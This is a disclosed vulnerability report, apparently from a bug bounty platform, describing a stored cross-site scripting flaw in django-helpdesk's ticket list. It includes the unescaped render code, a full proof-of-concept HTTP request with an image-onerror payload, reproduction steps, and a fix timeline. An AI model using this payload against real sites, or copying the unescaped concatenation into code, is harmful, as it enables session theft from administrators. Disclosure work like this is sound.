Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk
Status: Valid
Reported on Nov 3rd 2021
Description
Stored XSS via the [title] parameter when creating a new ticket
Details
In the admin ticket table, the render function for the [Ticket] column inserts the ticket title into HTML without escaping, which allows arbitrary JavaScript execution.
Vulnerability code
    {
        data: "ticket",
        render: function (data, type, row, meta) {
            if (type === 'display') {
                // row.title is user-controlled and concatenated into markup unescaped
                data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' +
                    row.id + '. ' +
                    row.title + '</a></div>';
            }
            return data;
        }
    },
Rendered output when [title] contains the payload:
<td><div class="tickettitle"><a href="/tickets/57832/">57832. "><img src="x" onerror="alert(1);"></a></div></td>
Proof of Concept
// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: django-helpdesk-demo.herokuapp.com
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Origin: https://django-helpdesk-demo.herokuapp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="csrfmiddlewaretoken"
Sn6i713aQfmhgW3ET6Q39tRXE3yt0kePKM6tsSFZEw266gb1EYyqakPSJyAJ1ByV
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="queue"
1
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="title"
"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="body"
test
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="priority"
3
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="due_date"
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="submitter_email"
test@example.com
-----------------------------35329910622610784793670383726--
Steps to Reproduce
Without logging in, go to the URL for creating a new ticket: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
In the [Summary of the problem] field, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">
The XSS triggers when an admin loads the list of all tickets.
Impact
An attacker could use this vulnerability to steal a user's cookie and then use the stolen cookie to gain unauthorized access to that user's account.
2 years ago: We are processing your report and will contact the django-helpdesk team within 24 hours.
2 years ago: lethanhphuc modified the report.
2 years ago: We have contacted a member of the django-helpdesk team and are waiting to hear back.
2 years ago: We have sent a follow up to the django-helpdesk team. We will try again in 7 days.
2 years ago: PR: https://github.com/django-helpdesk/django-helpdesk/pull/980
A django-helpdesk/django-helpdesk maintainer commented 2 years ago:
Fix has been merged and will be released in the next bugfix release. Thanks!
Vulnerable code location: ticket_list.html#L369